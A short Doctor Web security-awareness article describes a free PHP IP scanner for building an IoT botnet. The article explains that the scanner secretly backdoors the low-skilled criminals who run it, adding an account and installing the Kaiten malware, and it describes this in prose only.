Your browser is obsolete!

The page may not load correctly.

“Botology” basics

Основы ботоведения

Other issues in this category (4)
  • add to favourites
    Add to Bookmarks

Dog eats dog

Read: 21643 Comments: 2 Rating: 11

Thursday, December 14, 2017

Some believe the hacker community is friendly and always ready to help out its members, in word and in deed. But is that really so?

Bleeping Computer told its readers about an IP scanner that a hacker wannabe or a script kiddie could use to set up their own Reaper botnet.

An unknown criminal created a website to advertise the free PHP script they wrote. The script can detect devices running the GoAhead embedded web server (as a rule, this means IP cameras and other IoT devices).

Creating a botnet (a centrally controlled zombie network of infected devices) has always been a favourite pastime of hackers. Botnets offer their owners excellent capabilities, ranging from spamming and mining activities to mounting powerful DDoS attacks. There exist several ways to create a botnet. For example, it’s possible to scan computers and devices over the Internet (including your Android tablet, if you're using it to read this issue), determine whether they have vulnerabilities, and then exploit them to deploy malicious code. This is exactly what the specialised scanner applications do.

Script kiddies are inexperienced (or low-skilled) criminals who can't write an exploit or a complex hack tool on their own, i.e., they are underachievers who are after easy money.

Script kiddies eager to possess a botnet of their own are unlikely to notice that a large portion of this "simple" PHP script is heavily obfuscated.

Obfuscation is a set of techniques used to deliberately produce software code that will be harder to understand.

The advertised PHP script consists of four parts:

  1. A working IP scanner, just as the ads promise;
  2. The piece of code responsible for launching bash instructions and adding a new user account onto the server on which the victim will launch the IP scanner;
  3. The piece of code connecting the victim's node to a remote server;
  4. The portion of code that downloads and launches the Kaiten malware on the victim's node. This malware is used to create the eponymous botnet.

Thus, a script kiddie who is eager to establish a Reaper-like botnet will make their machine part of the Kaiten network. The malicious scanner's author uses deception to take advantage of hundreds of script kiddies.

And now, attention!!!

#hacker #IoT #terminology #responsibility

The Anti-virus Times recommends

  1. Do you think attackers should be prosecuted for attempting to take advantage of other criminals?
  2. Should an anti-virus detect malicious files deployed on a script kiddie’s computers? Obviously the scanner script should be blocked; there’ no doubt about that.


Tell us what you think

To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.